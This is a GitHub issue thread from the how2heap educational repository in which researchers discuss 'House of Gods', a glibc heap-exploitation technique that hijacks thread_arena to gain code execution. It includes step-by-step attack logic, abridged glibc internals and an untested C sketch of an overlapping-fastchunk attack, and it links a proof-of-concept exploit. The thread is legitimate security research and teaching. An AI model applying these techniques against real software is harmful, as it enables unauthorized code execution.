shellphish / how2heap

A repository for learning various heap exploitation techniques.

House of Gods #157

Closed · Milo-D closed this 1 year ago

Milo-D commented 2 years ago

Hi all,

I was working on a new heap exploitation technique for older versions of glibc (< 2.27). House of Gods hijacks the thread_arena within only 8 allocations (9 if you allocate a separate chunk for the fake arena) and drops a shell after 10 allocations. It is suitable for scenarios where the attacker only has a single write-after-free (WAF) on an unsorted chunk (and no WAF on fastchunks).

Exploit was tested against:

I have yet to test it against the official ubuntu release, but this should not be a problem. If you are interested in a pull request, I will start preparing everything you need.

Very detailed paper: https://github.com/Milo-D/house-of-gods/blob/master/HOUSE_OF_GODS.TXT
POC exploit: https://github.com/Milo-D/house-of-gods/blob/master/exploit.py

All other relevant files can be found here: https://github.com/Milo-D/house-of-gods/

Thanks for reading :)

Kyle-Kyle commented 2 years ago

Hi. Sorry for the late response and thank you for submitting the issue. I'll investigate this technique today.

Milo-D commented 2 years ago

Great, thank you :)

Kyle-Kyle commented 2 years ago

Let me repeat what the technique is about to make sure I understand it correctly:

  1. it uses a UAF write bug to link the binmap-chunk into the unsorted bin list (requires a known heap address for linking the binmap-chunk, and a libc address for linking main_arena). At this moment, the unsorted bin is corrupted because main_arena does not have a correct bk or size
  2. use fastbin pointers (planted by freeing fastbin chunks) in main_arena to forge bk and size, and now the unsorted bin is kinda fixed
  3. by abusing the hijacked linked list, we control main_arena->next
  4. launch an unsortedbin attack to overwrite narenas using an exact fit (using the hijacked unsortedbin list). This tricks libc into thinking there are too many arenas and starts the arena-reusing logic.
  5. do malloc(<huge value>) twice to set next_to_use to a fake arena, and now we can perform allocations from the fake arena.
  6. now allocate a fastbin chunk from the fake arena to overwrite __malloc_hook
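
To make the write-up self-contained: the arena-reuse path that steps 4 and 5 abuse looks roughly like this. This is my abridged paraphrase of glibc 2.24's malloc/arena.c (quoted from memory, so check the real source for exact details):

```c
/* malloc/arena.c (glibc 2.24), heavily abridged paraphrase.
   Step 4's unsortedbin attack writes a huge value into narenas, so the
   "create a new arena" branch is never taken again and every call falls
   through to reused_arena().  */
static mstate
arena_get2 (size_t size, mstate avoid_arena)
{
  mstate a = get_free_list ();
  if (a == NULL)
    {
      static size_t narenas_limit;      /* derived from the core count */
      size_t n = narenas;               /* attacker-controlled after step 4 */

      if (__glibc_unlikely (n <= narenas_limit - 1))
        a = _int_new_arena (size);      /* normal path */
      else
        a = reused_arena (avoid_arena); /* forced reuse path */
    }
  return a;
}

static mstate
reused_arena (mstate avoid_arena)
{
  static mstate next_to_use;            /* step 5 walks this to the fake arena */
  if (next_to_use == NULL)
    next_to_use = &main_arena;

  /* Iterate over all arenas via the ->next list hijacked in step 3.  */
  mstate result = next_to_use;
  do
    {
      if (!arena_is_corrupt (result) && !mutex_trylock (&result->mutex))
        goto out;
      result = result->next;
    }
  while (result != next_to_use);
  /* ... fallback: lock next_to_use itself ... */
out:
  next_to_use = result->next;           /* the returned arena becomes thread_arena */
  return result;
}
```
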
Kyle-Kyle commented 2 years ago

I think the technique is interesting, especially step 2. I have a question though: with steps 1 & 2, which use fastbins to fake an unsortedbin header inside main_arena, is it possible to allocate a chunk inside main_arena itself (using the UAF write in an unsorted bin)? If it is possible, you can simply overwrite main_arena->top to get an arbitrary write. Speaking of faking valid headers using fastbins: a few years ago I did this by using a fastbin UAF to fake a valid chunk inside main_arena->fastbinsY. Allocating at that location and overwriting everything in it gives us an "arbitrary" write primitive (of course, with a valid size in the header). But that's another technique. In fact, I think you should do the main_arena->top exploitation in your step 6, because the fastbin approach requires a 0x7f size, which is not actually an arbitrary write.
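
For reference, the struct both of these tricks poke at looks roughly like this in glibc 2.24 (abridged from memory; treat the exact field list as approximate):

```c
/* malloc/malloc.c (glibc 2.24), abridged from memory.  main_arena is a
   static instance of this struct inside libc.  */
struct malloc_state
{
  mutex_t mutex;
  int flags;                          /* FASTCHUNKS_BIT lives here pre-2.27 */
  mfastbinptr fastbinsY[NFASTBINS];   /* fastbin list heads (heap pointers) */
  mchunkptr top;                      /* the overwrite target mentioned above */
  mchunkptr last_remainder;
  mchunkptr bins[NBINS * 2 - 2];      /* unsorted/small/large bin list heads */
  unsigned int binmap[BINMAPSIZE];
  struct malloc_state *next;          /* circular arena list (step 3) */
  struct malloc_state *next_free;
  INTERNAL_SIZE_T attached_threads;
  INTERNAL_SIZE_T system_mem;         /* bounds the unsorted-bin size check */
  INTERNAL_SIZE_T max_system_mem;
};
```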

Kyle-Kyle commented 2 years ago

Can you please answer the question above (about whether it is possible to allocate a chunk inside main_arena using the unsorted bin)? Thanks

Milo-D commented 2 years ago

Let me repeat what the technique is about to make sure I understand it correctly:

1. it uses a UAF write bug to link the `binmap-chunk` into the `unsorted bin` list (requires a known heap address for linking the `binmap-chunk`, and a libc address for linking `main_arena`). At this moment, the unsorted bin is corrupted because `main_arena` does not have a correct `bk` or `size`

2. use fastbin pointers (planted by freeing fastbin chunks) in `main_arena` to forge `bk` and `size`, and now the unsorted bin is kinda fixed

3. by abusing the hijacked linked list, we control `main_arena->next`

4. launch an unsortedbin attack to overwrite `narenas` using an exact fit (using the hijacked unsortedbin list). This tricks libc into thinking there are too many arenas and starts the arena-reusing logic.

5. do `malloc(<huge value>)` twice to set `next_to_use` to a fake arena, and now we can perform allocations from the fake arena.

6. now allocate a fastbin chunk from the fake arena to overwrite `__malloc_hook`

Yep, everything correct.

In fact, I think you should do the main_arena->top exploitation in your step 6, because the fastbin approach requires a 0x7f size, which is not actually an arbitrary write.

Step 6 (or stage 3 in the paper) is actually just a small demonstration of how one could potentially abuse the hijacked arena in order to execute arbitrary code. So I picked the path of least resistance, which was to corrupt the fastbins. Allocating from the top chunk of a non-main arena is not really arbitrary either, since the returned chunk must have the IS_MMAPPED flag set, otherwise it would probably segfault. But maybe we could get around this limitation by setting the IS_MMAPPED flag of the initial top chunk header. When malloc remainders the top chunk, it might also copy the IS_MMAPPED flag of the initial header over to the new header. But I did not try this; there might be top chunk sanity checks against that.

But as for now, step 6 is meant to be a variable and replaceable part, since it is trivial to escalate to ACE once the arena is hijacked.

Can you please answer the question above (about whether it is possible to allocate a chunk inside main_arena using the unsorted bin)? Thanks

Glad you asked :) That was actually my initial approach, even before considering the main_arena.next pointer. Sadly, it did not work out. I don't remember the exact reason, but I think it had something to do with the have_fastchunks flag being set, which would trigger a call to malloc_consolidate when trying to allocate the main_arena chunk as an exact fit (since a heap pointer is used as the size field). Even if we remainder the main_arena chunk in order to avoid large memory requests (thus avoiding malloc_consolidate), malloc would probably still segfault in the unlink macro because of next_chunk(P).
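
For reference, this is the consolidation trigger I am talking about, in _int_malloc (glibc 2.23/2.24, abridged from memory): any request in largebin range first flushes the fastbins.

```c
/* malloc/malloc.c, _int_malloc() (glibc 2.23/2.24), abridged.
   nb is the normalized request size.  A heap pointer used as a size
   field forces the exact-fit request into largebin range, so if the
   arena's FASTCHUNKS_BIT is set, malloc_consolidate() runs first.  */
if (in_smallbin_range (nb))
  {
    /* ... try the matching smallbin first ... */
  }
else
  {
    idx = largebin_index (nb);
    if (have_fastchunks (av))
      malloc_consolidate (av);
  }
```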

Hope this answers your questions :)

Edit: Fixed a mistake.

Kyle-Kyle commented 2 years ago

Step 6 (or stage 3 in the paper) is actually just a small demonstration of how one could potentially abuse the hijacked arena in order to execute arbitrary code. So I picked the path of least resistance, which was to corrupt the fastbins. Allocating from the top chunk of a non-main arena is not really arbitrary either, since the returned chunk must have the IS_MMAPPED flag set, otherwise it would probably segfault. But maybe we could get around this limitation by setting the IS_MMAPPED flag of the initial top chunk header. When malloc remainders the top chunk, it might also copy the IS_MMAPPED flag of the initial header over to the new header. But I did not try this; there might be top chunk sanity checks against that.

That's right. Now the memory is coming back to me. A pointer is needed to serve as a valid size for the top chunk.

Sadly, it did not work out. I don't remember the exact reason, but I think it had something to do with the have_fastchunks flag being set, which would trigger a call to malloc_consolidate when trying to allocate the main_arena chunk as an exact fit (since a heap pointer is used as the size field).

I see. But I'm very curious about this. The issue here is that:

  1. we use a pointer as the size, which means it's a chunk with a huge size
  2. you tried an exact fit, which means you probably tried to allocate a huge value, which triggers malloc_consolidate

I have two potential solutions to allocate a chunk inside main_arena:

  1. instead of doing an exact fit, what if we just do a small allocation? Like, we allocate a small chunk (big enough to overwrite main_arena) out of this huge chunk?
  2. what if we do a misaligned allocation? Before 2.32, glibc allows returning a misaligned chunk. In this case, if the heap pointer is 0x55xxxxxxxxxx, we can misalign the pointer and use 0x55 as the size, which should be small enough to avoid malloc_consolidate (see the toy sketch below).
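
A toy (non-exploit) illustration of the second idea, with a made-up address:

```c
/* Toy illustration (not an exploit): a misaligned view of a stored heap
   pointer yields a small, malloc_consolidate-safe size.  The address
   below is made up.  */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

int main(void)
{
    uint64_t heap_ptr = 0x000055a1b2c3d4e8ULL; /* hypothetical PIE heap addr */
    unsigned char mem[16] = { 0 };
    memcpy(mem, &heap_ptr, 8);        /* pointer as it sits in memory (LE) */

    /* Read a "size field" that overlaps only the top bytes of the pointer:
       bytes 5..12 are 55 00 00 00 ..., i.e. the size reads as 0x55.  */
    uint64_t size;
    memcpy(&size, mem + 5, 8);
    printf("misaligned size: %#llx\n", (unsigned long long) size); /* 0x55 */
    return 0;
}
```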

If possible, can you verify whether either one works?

The reason why I'm asking is that I think this technique is too complicated in its current form. I'd like to split it into two small atomic techniques: one doing an allocation inside main_arena using the unsorted bin, and the other doing forced arena reusing. And I think the latter may still be feasible in glibc 2.35 if combined with a largebin attack.

Kyle-Kyle commented 2 years ago

I have another question: in your original example, you used a non-PIE binary, which means heap pointers are relatively small. Does it still work with PIE heap pointers? PIE heap pointers are larger and I wonder whether they can serve as valid chunk sizes.

Milo-D commented 2 years ago
  1. instead of doing an exact fit, what if we just do a small allocation? Like, we allocate a small chunk (big enough to overwrite `main_arena`) out of this huge chunk?

It would still segfault due to next_chunk(P) within the unlink macro. I tried that a couple of months ago ^^ sadly, no success.

  2. what if we do a misaligned allocation? Before 2.32, glibc allows returning a misaligned chunk. In this case, if the heap pointer is 0x55xxxxxxxxxx, we can misalign the pointer and use 0x55 as the size, which should be small enough to avoid malloc_consolidate.

Misaligning the size field leads to misalignment in the fd, bk, fd_nextsize and bk_nextsize of the main_arena chunk, which in turn triggers a failure within the unlinking process.

Edit: Actually, option 2 would fail even before binning the main_arena chunk. It would not pass the unsorted-bin checks, due to the misaligned bk.

Milo-D commented 2 years ago

I have another question: in your original example, you used a non-PIE binary, which means heap pointers are relatively small. Does it still work with PIE heap pointers? PIE heap pointers are larger and I wonder whether they can serve as valid chunk sizes.

It works with PIE binaries, too. We can set main_arena.system_mem to an arbitrary value, so the unsorted-bin checks are no problem for us, even with PIE heap pointers.
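
For reference, the unsorted-bin check in question, from _int_malloc (glibc 2.23/2.24, abridged from memory); with system_mem under our control, even a large PIE heap pointer passes as a size:

```c
/* malloc/malloc.c, _int_malloc() unsorted-bin scan (glibc 2.23/2.24),
   abridged.  With main_arena.system_mem attacker-controlled, a PIE heap
   pointer (e.g. 0x55xxxxxxxxxx) used as victim->size passes this check.  */
if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (victim->size > av->system_mem, 0))
  malloc_printerr (check_action, "malloc(): memory corruption",
                   chunk2mem (victim), av);
```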

Kyle-Kyle commented 2 years ago

I like this technique a lot and I think it is very cool. It opens the door to exploiting arenas.

However, I'm a little hesitant about merging this, because it feels like overkill: it requires a lot of primitives (heap leak, libc leak, UAF write, allocation of arbitrary size) and a restriction (UAF in the unsorted bin and not the fastbin). I'm thinking about whether simpler exploitation is possible under the same setting. If there is nothing much simpler, I will happily merge it.

So, I wonder: since overwriting narenas requires an unsortedbin attack, what if we use the unsortedbin attack to hijack a fastbin instead? That would give us a use-after-free in the fastbin and achieve the end goal of House of Gods.

^ This approach requires a heap leak, a known target address (a libc leak is not a hard dependency) and a UAF write, potentially without the allocation of arbitrary size.

Milo-D commented 2 years ago

So, I wonder: since overwriting narenas requires an unsortedbin attack, what if we use the unsortedbin attack to hijack a fastbin instead? That would give us a use-after-free in the fastbin and achieve the end goal of House of Gods.

The end goal is not really to tamper with the fastbins but to hijack thread_arena ^^ Allocating from the fastbins of the fake arena is only one of many options. House of Gods can be seen as a primitive to hijack thread_arena.

Sadly, I did not find a simpler way. I found an alternative, but it required ~200 allocations (though it did not need requests of arbitrary size) and was way more complex than this one.

I have worked on this type of technique mainly to discover new strategies involving unusual/rare code paths. For example, there seems to be no technique that targets the process of arena switching... which is kinda sad, because it offers exploitable linked lists and zero glibc mitigations/security-checks :)

Carl-Be commented 1 year ago

because it offers exploitable linked lists and zero glibc mitigations/security-checks :)

Interesting I'm just starting my heap journey and this excites me!

Milo-D commented 1 year ago

because it offers exploitable linked lists and zero glibc mitigations/security-checks :)

Interesting I'm just starting my heap journey and this excites me!

Feel free to share your ideas, if you decide to look into this small subset of malloc :) Would be interesting to see more arena related techniques.

Milo-D commented 1 year ago

I like this technique a lot and I think it is very cool. It opens the door to exploiting arenas.

However, I'm a little hesitant about merging this, because it feels like overkill: it requires a lot of primitives (heap leak, libc leak, UAF write, allocation of arbitrary size) and a restriction (UAF in the unsorted bin and not the fastbin). I'm thinking about whether simpler exploitation is possible under the same setting. If there is nothing much simpler, I will happily merge it.

So, I wonder: since overwriting narenas requires an unsortedbin attack, what if we use the unsortedbin attack to hijack a fastbin instead? That would give us a use-after-free in the fastbin and achieve the end goal of House of Gods.

^ This approach requires a heap leak, a known target address (a libc leak is not a hard dependency) and a UAF write, potentially without the allocation of arbitrary size.

A simpler way I could think of would be to allocate an overlapping fastchunk (embedded into another, properly allocated chunk) from the unsorted bin by tampering with the bk of an unsorted chunk, and then just free the fastchunk. This should allow one to UAF a fastchunk (-> fastbin attack) by writing to the previously used unsorted chunk. A rough sketch follows below.
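
For concreteness, this is roughly what I mean; an untested sketch written for glibc 2.23/2.24 without tcache, where every size and offset is an assumption rather than something from the original exploit:

```c
/* Untested sketch: overlapping fastchunk via a tampered unsorted bk
   (glibc 2.23/2.24, no tcache, default max fastbin size 0x80). */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void)
{
    setbuf(stdout, NULL);                /* keep stdio from calling malloc */

    uint64_t *a = malloc(0x88);          /* chunk A, size 0x90 -> unsorted */
    uint64_t *b = malloc(0xf8);          /* chunk B hosts the fake chunk */

    free(a);                             /* A goes into the unsorted bin */

    /* Fake 0x60-sized chunk inside B, plus a sane "next chunk" size so a
       later free() of the fake chunk passes the fastbin sanity check. */
    uint64_t *fake = &b[2];              /* fake header at b+0x10, aligned */
    fake[1]  = 0x61;                     /* fake size, prev_inuse set */
    fake[3]  = (uint64_t) &fake[12];     /* fake bk -> writable scratch in B */
    fake[13] = 0x21;                     /* size of the chunk after the fake */

    /* The bug: a single write-after-free on the unsorted chunk's bk. */
    a[1] = (uint64_t) fake;              /* A->bk = fake chunk */

    /* 1st malloc returns A (exact fit) and leaves the fake chunk as the
       unsorted bin's bk; 2nd malloc returns the fake chunk (exact fit). */
    malloc(0x88);
    uint64_t *overlap = malloc(0x58);    /* == &fake[2], inside B */

    /* Free the overlapping chunk into the 0x60 fastbin; we can still write
       to it through b, i.e. a fastbin UAF -> classic fastbin attack. */
    free(overlap);
    fake[2] = 0x4141414141414141ULL;     /* tamper with the freed fd via b */

    printf("overlapping chunk %p lives inside b %p\n",
           (void *) overlap, (void *) b);
    return 0;
}
```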

But it would not make any use of the arena stuff. If the only goal of this repository is to drop a shell as fast and as easily as possible, then that would probably be the way to go, and House of Gods would be unnecessarily complicated. But if we want to demonstrate a broad spectrum of possible heap exploitation techniques, then, in my opinion, we should include this technique, since it is distinct from other techniques and exploits unique targets (thread_arena, reused_arena() and, in general, the arena linked list) which are not covered by existing heap techniques. So while this technique might not be the simplest one, it might still raise people's awareness of the arena code in arena.c, and maybe new and better ways to leverage this subset of malloc will follow.

This is only my opinion and I might be wrong about it. So I guess it is on you guys to decide :) In case you accept it, I will sit down and prepare a suitable proof of concept for this repository.

Thanks for reading.

Kyle-Kyle commented 1 year ago

I think you are right. The purpose of this repository is to teach and inspire more people to explore the art of heap exploitation instead of just serving as a collection of techniques. I'd be glad to merge it. But please explicitly mention the primitives needed for performing this technique in the documentation.

And I'm sorry for the delayed response.

Milo-D commented 1 year ago

Glad we agree.

I will prepare everything for the PR :)

Kyle-Kyle commented 1 year ago

thanks!

Kyle-Kyle commented 1 year ago

The 2.24 version of house-of-gods works, so I tried to port it to 2.23. But it seems to stop working in 2.23, and the crash seems non-trivial. Can you take a look at why the same exploit does not work in 2.23? (My guess is offset issues.)

Milo-D commented 1 year ago

The 2.24 version of house-of-gods works, so I tried to port it to 2.23. But it seems to stop working in 2.23, and the crash seems non-trivial. Can you take a look at why the same exploit does not work in 2.23? (My guess is offset issues.)

Yep, you might be right about the offsets. I hardcoded the distance between

  1. the unsorted bin and narenas-0x10
  2. the unsorted bin and the binmap-chunk

The distance in (2) should be the same for 2.23 and 2.24, I guess. But (1) may vary across different libc versions.

I will take a closer look as soon as possible :)

Milo-D commented 1 year ago

Hi @Kyle-Kyle

I've recently uploaded the first revision of HoG, and although it is very difficult to apply, it might contain a somewhat interesting finding.

Take a look at the arena corruption capability at line 456 of the document.

A simple unsorted bin attack against the corruption bit effectively resets the state of the current arena, which allows one to restore broken/corrupted structures like bins and the heap in general. This primitive is also cheap and does not corrupt any structures.
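
For reference, the corruption bit discussed there is this per-arena flag from glibc 2.23/2.24 malloc (abridged from memory; how the reset actually plays out is detailed in the linked document):

```c
/* malloc/malloc.c (glibc 2.23/2.24), abridged.  These are the arena
   corruption-flag helpers targeted by the unsorted bin attack that the
   document describes around line 456.  */
#define ARENA_CORRUPTION_BIT (4U)

#define arena_is_corrupt(A)   (((A)->flags & ARENA_CORRUPTION_BIT))
#define set_arena_corrupt(A)  ((A)->flags |= ARENA_CORRUPTION_BIT)
```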

The only requirements would be a WAF bug on an unsorted chunk and a libc leak. But it should be possible to perform a leakless variant by partially overwriting the bk pointer of a free'd unsorted chunk and guessing a nibble of ASLR entropy with a 1/16 chance.

What do you think? It might not be relevant at all, but I thought this could be an interesting primitive :)

https://github.com/Milo-D/house-of-gods/blob/master/rev1/HOUSE_OF_GODS.TXT

Kyle-Kyle commented 1 year ago

It is good to know that this technique can be improved to need fewer primitives. It'd be great if you could 1. update the existing technique in the repo to only need a UAF write on an unsorted chunk and a libc leak, and 2. add another variant that is leakless.

Milo-D commented 1 year ago

It is good to know that this technique can be improved to need fewer primitives. It'd be great if you could 1. update the existing technique in the repo to only need a UAF write on an unsorted chunk and a libc leak, and 2. add another variant that is leakless.

Sorry for the confusion. I was not talking about an improvement of the previous technique. I wanted to discuss with you if it would make sense to add a primitive/idea of the alternative version of HoG to how2heap :) The idea is described at line 456 (corruption bit).

Kyle-Kyle commented 1 year ago

I think a technique variant is less interesting, because the gist of the technique is already there, unless it can achieve something very different.

Milo-D commented 1 year ago

Okay :) I think we can close this issue.